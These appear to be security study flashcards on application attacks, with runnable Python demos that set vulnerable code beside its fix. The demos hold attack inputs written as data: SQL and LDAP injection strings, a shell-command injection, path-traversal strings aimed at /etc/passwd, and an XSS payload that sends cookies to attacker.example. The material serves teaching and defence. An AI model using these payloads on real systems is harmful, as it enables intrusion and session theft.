Application Attacks Flashcards
_____ is a malicious script hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site.
Cross-site scripting (XSS)
_____ is a malicious script hosted on the attacker’s site that can exploit a session started on another site in the same browser. It succeeds when the target server does not verify that the user intentionally made the request (for example, by checking a per-session anti-forgery token).
Cross-site Request Forgery (XSRF)
An _____ attack inserts an SQL query as part of user input, which allows an attacker to extract or insert information into the database or execute arbitrary code.
SQL injection
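The card above as a runnable demonstration (an added example, not material from the original flashcards): a constructed in-memory SQLite table stands in for the application database, and the same login check is written twice, once by string concatenation and once with a parameterised query. The tautology payload and the comment payload are the classic forms; the function and table names are assumptions for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database: one user row, assumed for the example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse', 'admin')")
    return db


def login_vulnerable(db, username, password):
    """Builds the statement from user input, so input becomes SQL syntax."""
    sql = (f"SELECT username, role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Parameterised query: the driver passes values separately, so they stay data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


# Tautology payload: turns the WHERE clause into (... AND password='') OR '1'='1'.
TAUTOLOGY = "' OR '1'='1"
# Comment payload: closes the username literal and comments out the password check.
COMMENT_OUT = "alice'--"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice", TAUTOLOGY))     # ('alice', 'admin') without the password
    print(login_vulnerable(db, COMMENT_OUT, "wrong"))   # ('alice', 'admin') again
    print(login_safe(db, "alice", TAUTOLOGY))           # None
    print(login_safe(db, COMMENT_OUT, "wrong"))         # None
```

With the concatenated query the database answers the attacker's logic rather than the developer's; with placeholders the same strings are compared literally against the stored values and simply fail to match.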
A _____ attack injects OS shell commands through input that the application passes to a command interpreter. The injected commands are not confined to the server’s document root and run with the privileges of the web server process (often a low-privileged “guest” account).
command injection
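The card above as a runnable demonstration (an added example, not material from the original flashcards, assuming a POSIX shell): a hypothetical host-lookup feature runs a command that includes a user-supplied host name. `echo` stands in for the real tool so the example runs anywhere; the vulnerable form hands the string to the shell, the safe form validates against an allowlist and passes the value as a single argv element.

```python
import re
import subprocess

# Allowlist for a DNS host name (assumption: letters, digits, dot and hyphen only).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Constructed attacker input: the ';' ends the intended command and starts another.
PAYLOAD = "example.com; echo INJECTED"


def lookup_vulnerable(user_input):
    """Interpolates input into a shell command line; shell metacharacters are honoured."""
    cmd = "echo resolving " + user_input          # stands in for e.g. "ping -c1 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_argv_only(user_input):
    """No shell: the whole input is one argument, so ';' is just a character."""
    out = subprocess.run(["echo", "resolving", user_input], capture_output=True, text=True)
    return out.stdout


def lookup_safe(user_input):
    """Allowlist validation plus argv passing; rejects anything that is not a host name."""
    if not HOSTNAME_RE.match(user_input):
        raise ValueError("invalid host name: %r" % user_input)
    return lookup_argv_only(user_input)


if __name__ == "__main__":
    print(repr(lookup_vulnerable(PAYLOAD)))   # 'resolving example.com\nINJECTED\n'
    print(repr(lookup_argv_only(PAYLOAD)))    # 'resolving example.com; echo INJECTED\n'
    try:
        lookup_safe(PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

Whatever the second command is, it executes as the account the web server runs under, which is why the card stresses the “guest” user: the attacker inherits exactly that user’s file and network access.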
_____ occurs when the attacker supplies a path containing sequences such as ../ (often URL-encoded) to read or write a file outside the web server’s root directory.
Directory traversal
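The card above as a runnable demonstration (an added example, not material from the original flashcards): a hypothetical static-file handler maps a requested path onto a document root. The vulnerable resolver joins and normalises only; the safe one decodes (twice, to catch double encoding), normalises, and then confirms the result is still under the root. `posixpath` is used so the behaviour is the same on any OS.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root for the example


def resolve_vulnerable(requested):
    """Joins the request path onto the root with no containment check."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested.lstrip("/")))


def resolve_safe(requested):
    """Decode, normalise, then refuse anything that left WEB_ROOT.

    A real server would additionally resolve symlinks (realpath) before the
    check; that step is omitted here so the example runs without a filesystem.
    """
    decoded = unquote(unquote(requested))          # handles %2e%2e and %252e%252e
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    root = posixpath.normpath(WEB_ROOT)
    # The trailing separator stops "/var/www/htmlsecret" passing as inside "/var/www/html".
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError("path escapes document root: " + requested)
    return candidate


if __name__ == "__main__":
    for req in ("index.html", "css/../index.html",
                "../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd", "%252e%252e/%252e%252e/%252e%252e/etc/passwd"):
        try:
            print(req, "->", resolve_safe(req))
        except PermissionError as e:
            print(req, "->", e)
    print(resolve_vulnerable("../../../etc/passwd"))   # /etc/passwd
```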
_____ describes the problem of authorizing a request for a service that depends on an intermediate service.
Transitive access
A _____ occurs when an attacker supplies input that the application embeds unsanitised into an LDAP search filter, allowing the attacker to bypass authentication, read or modify directory entries, or change authorizations and privileges. LDAP uses TCP port 389 (636 for LDAP over TLS).
Lightweight Directory Access Protocol (LDAP) injection
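The card above as a runnable demonstration (an added example, not material from the original flashcards): a hypothetical login builds an LDAP search filter from the submitted user name and password. The vulnerable builder concatenates; the safe one escapes the value characters defined in RFC 4515. A small paren-depth helper shows what a directory server that parses the first complete filter would actually evaluate.

```python
def ldap_escape(value):
    """RFC 4515 escaping for a value placed inside a search filter."""
    out = []
    for ch in value:
        if ch in "\\*()\0":                 # backslash, star, parens, NUL
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def login_filter_vulnerable(user, password):
    """User input becomes filter syntax."""
    return f"(&(uid={user})(userPassword={password}))"


def login_filter_safe(user, password):
    """Input is escaped, so it can only ever be an attribute value."""
    return f"(&(uid={ldap_escape(user)})(userPassword={ldap_escape(password)}))"


def first_complete_filter(f):
    """Return the prefix up to where parentheses first balance.

    Some directory servers evaluate only this part and ignore trailing text,
    which is what makes the payload below match every user.
    """
    depth = 0
    for i, ch in enumerate(f):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return f[:i + 1]
    return f


# Constructed attacker user name: closes the uid clause and re-opens a new one.
PAYLOAD_USER = "*)(uid=*))(|(uid=*"

if __name__ == "__main__":
    vuln = login_filter_vulnerable(PAYLOAD_USER, "x")
    print(vuln)                           # (&(uid=*)(uid=*))(|(uid=*)(userPassword=x))
    print(first_complete_filter(vuln))    # (&(uid=*)(uid=*))  -> password never checked
    print(login_filter_safe(PAYLOAD_USER, "x"))
```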
A _____ injection forces a running process to load and execute the attacker’s library, typically by abusing operating system features that let one process attach to another and write into its memory.
dynamic link library (DLL)
_____ means the code performs the same function by using different methods. Applied to malware, _____ means that antivirus software may no longer identify the sample by its signature.
Refactoring
_____ is the process of developing and implementing additional code between an application and the operating system to enable functionality that would otherwise be unavailable.
Shimming
_____ is a server-side input validation exploit in which the attacker’s script is carried in a crafted link or form submission and the server echoes it, unsanitised, into the response. When the victim follows the link, the malicious code executes in the user’s browser.
Reflected Cross-Site Scripting (XSS)
_____ is a server-side script attack in which the attacker’s code is saved into a back-end database used by the trusted site (for example, through a comment or profile field) and is served to every visitor who later views that content.
Stored (or persistent) Cross-Site Scripting (XSS)
_____ Cross-Site Scripting (XSS) exploits vulnerabilities in client-side scripts that write attacker-controlled data (such as part of the URL) into the page, modifying its content and layout without the payload ever reaching the server.
Document Object Model (DOM)
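The reflected and stored cards above as one runnable demonstration (an added example, not material from the original flashcards): a hypothetical search page echoes the query (reflected) and a comment page renders a constructed in-memory comment store (stored). Each is written unescaped and then with `html.escape`; a crude detector shows which responses would execute the payload. DOM-based XSS happens entirely in the browser, so it is not reproduced here.

```python
import html

# Constructed comment store standing in for the site's back-end database.
COMMENTS = []

# Constructed payload: exfiltrates the session cookie to an attacker host (assumed name).
PAYLOAD = '<script>location="http://attacker.example/?c="+document.cookie</script>'


def search_page_vulnerable(query):
    """Reflected: the query parameter goes straight into the response."""
    return f"<p>Results for: {query}</p>"


def search_page_safe(query):
    """Reflected, fixed: entity-encode before writing into HTML text."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def post_comment(text):
    """Stored: whatever is submitted is persisted for every later visitor."""
    COMMENTS.append(text)


def comments_page_vulnerable():
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def comments_page_safe():
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in COMMENTS) + "</ul>"


def contains_live_script(page):
    """A literal <script> tag in the response is one the browser will run."""
    return "<script>" in page


if __name__ == "__main__":
    print(search_page_vulnerable(PAYLOAD))
    print(search_page_safe(PAYLOAD))
    post_comment("nice article")
    post_comment(PAYLOAD)
    print(comments_page_vulnerable())
    print(comments_page_safe())
```

Escaping works because the browser only ever sees `&lt;script&gt;`, which renders as text; the same payload sits in the database either way, so the fix must be applied at output time, in every place the data is rendered.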
What can happen if program developers do not test a pointer with a logic statement before using it?
A malicious process can alter the execution environment so that the pointer is null; dereferencing it (a null pointer dereference) crashes the program
A _____ consists of intercepting a key or password hash, then reusing it to gain access to a resource. Using once-only session tokens or timestamping sessions prevents this type of attack.
replay attack
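The replay card above, together with the earlier Cross-site Request Forgery card, as one runnable demonstration (an added example, not material from the original flashcards): a hypothetical server issues a random, timestamped, single-use token into each form it renders and consumes it on the state-changing request. A forged cross-site request has no token, a captured request presented a second time finds its token already used, and an old token fails the timestamp check. Session storage, names and the 300-second lifetime are assumptions.

```python
import secrets
import time

TOKEN_TTL = 300        # seconds a token remains valid (assumed policy)


class Session:
    """Server-side state for one logged-in browser session (constructed, simplified)."""
    def __init__(self, user):
        self.user = user
        self.issued = {}   # nonce -> issue time, for tokens rendered but not yet used


def issue_token(session, now=None):
    """Called when a form is rendered: mint a nonce and remember it for this session."""
    now = time.time() if now is None else now
    nonce = secrets.token_hex(16)
    session.issued[nonce] = now
    return nonce


def validate_token(session, token, now=None):
    """Accept a token once: it must have been issued to this session, and be unexpired."""
    now = time.time() if now is None else now
    issued_at = session.issued.pop(token, None)   # consume it; a replay finds nothing
    if issued_at is None:
        return False      # forged, issued to another session, or already used
    return now - issued_at <= TOKEN_TTL


def handle_transfer(session, form, now=None):
    """The state-changing request; the token proves the user's own page submitted it."""
    if not validate_token(session, form.get("token"), now):
        return "rejected"
    return f"transferred {form['amount']} from {session.user}"


if __name__ == "__main__":
    alice = Session("alice")
    t = issue_token(alice, now=1000)
    print(handle_transfer(alice, {"token": t, "amount": 10}, now=1001))   # transferred
    print(handle_transfer(alice, {"token": t, "amount": 10}, now=1002))   # rejected (replay)
    print(handle_transfer(alice, {"amount": 10}, now=1002))               # rejected (no token: CSRF)
    t2 = issue_token(alice, now=1000)
    print(handle_transfer(alice, {"token": t2, "amount": 5}, now=1400))   # rejected (expired)
```

The cross-site attacker cannot read the token out of the victim’s page, so the forged request arrives without it; the network attacker who captured a valid request cannot reuse it because the server removed the nonce the first time it was spent.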
_____ occurs when the attacker inserts an invisible layer into a trusted web page that can intercept or redirect input without the user realizing it.
Clickjacking
An ______ occurs when an attacker takes advantage of insecure communication with application services to perform denial of service attacks
application programming interface (API) intrusion
A _____ is a code library that intercepts and redirects calls to enable legacy mode on a system.
shim
A _____ is a reference to an object in memory. Attempting to access that memory address is called dereferencing. An integer is a whole number (positive, negative, or zero) stored in a fixed number of bits.
pointer
An _____ attack causes the target software to calculate a value that exceeds the upper or lower bound of its integer type, so the stored result wraps around to an unexpected value (for example, a tiny buffer size).
integer overflow
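The card above as a runnable demonstration (an added example, not material from the original flashcards): Python integers never overflow, so the arithmetic of a 32-bit machine is reproduced by masking to 32 bits. A hypothetical allocation-size calculation (`count * elem_size`) wraps to a tiny number for a large count, which is the classic lead-in to a heap overflow; the safe version checks the bound before multiplying, the way a C program would test `count > SIZE_MAX / elem_size`.

```python
U32_MAX = 0xFFFFFFFF
INT32_MIN, INT32_MAX = -(1 << 31), (1 << 31) - 1


def mul_u32_wrapping(a, b):
    """Unsigned 32-bit multiply as the hardware does it: result modulo 2**32."""
    return (a * b) & U32_MAX


def add_i32_wrapping(a, b):
    """Signed 32-bit add with two's-complement wrap (undefined in C, shown modulo 2**32)."""
    r = (a + b) & U32_MAX
    return r - (1 << 32) if r & 0x80000000 else r


def buffer_size_vulnerable(count, elem_size):
    """Size computed with wrapping arithmetic: a huge count yields a tiny allocation,
    and the later copy of `count` elements runs far past the end of the buffer."""
    return mul_u32_wrapping(count, elem_size)


def buffer_size_safe(count, elem_size):
    """Reject the computation before it can wrap."""
    if elem_size <= 0 or count < 0 or count > U32_MAX // elem_size:
        raise OverflowError(f"{count} * {elem_size} does not fit in 32 bits")
    return count * elem_size


if __name__ == "__main__":
    # Constructed attacker-controlled element count, chosen so count*4 = 2**32 + 4.
    count = 0x40000001
    print(buffer_size_vulnerable(count, 4))        # 4  (bytes allocated for 1,073,741,825 elements)
    try:
        buffer_size_safe(count, 4)
    except OverflowError as e:
        print("rejected:", e)
    print(add_i32_wrapping(INT32_MAX, 1))          # -2147483648 (upper bound exceeded)
    print(add_i32_wrapping(INT32_MIN, -1))         # 2147483647  (lower bound exceeded)
```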
A _____ is a software vulnerability that occurs when the execution processes are dependent on the timing of certain events, and those events fail to execute in the order and timing intended.
race condition
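The card above as a runnable demonstration (an added example, not material from the original flashcards): a constructed bank account is debited by two threads that each check the balance and then subtract. The racy version has nothing holding the balance fixed between check and act; a `window` hook, used only by the demonstration, stalls the first thread inside that gap so the second one always slips in. The safe version performs check and update under one lock. The amounts and the 0.3 s stall are assumptions chosen to make the interleaving deterministic.

```python
import threading
import time


class Account:
    """Constructed shared resource: a balance plus a lock for the safe variant."""
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_racy(acct, amount, window=None):
    """Time-of-check / time-of-use: the state can change between the two lines."""
    if acct.balance >= amount:          # time of check
        if window:
            window()                    # demonstration hook: another thread runs here
        acct.balance -= amount          # time of use
        return True
    return False


def withdraw_safe(acct, amount, window=None):
    """Same logic, but check and update are one atomic step under the lock."""
    with acct.lock:
        if acct.balance >= amount:
            if window:
                window()
            acct.balance -= amount
            return True
        return False


def run_race(withdraw):
    """Two withdrawals of 80 from a balance of 100.

    Thread A passes its check, signals, then stalls; thread B is started only
    after that signal, so it always attempts its withdrawal inside A's window.
    Returns (A succeeded, B succeeded, final balance).
    """
    acct = Account(100)
    a_checked = threading.Event()
    results = {}

    def stall():
        a_checked.set()
        time.sleep(0.3)

    def run_a():
        results["a"] = withdraw(acct, 80, window=stall)

    def run_b():
        results["b"] = withdraw(acct, 80)

    ta = threading.Thread(target=run_a)
    tb = threading.Thread(target=run_b)
    ta.start()
    a_checked.wait()
    tb.start()
    ta.join()
    tb.join()
    return results["a"], results["b"], acct.balance


if __name__ == "__main__":
    print("racy:", run_race(withdraw_racy))   # (True, True, -60): both pass the check
    print("safe:", run_race(withdraw_safe))   # (True, False, 20): B waits, then fails the check
```

In the safe run thread B blocks on the lock for the whole stall and only gets to check the balance after A has already debited it; that ordering is exactly what the racy version fails to guarantee.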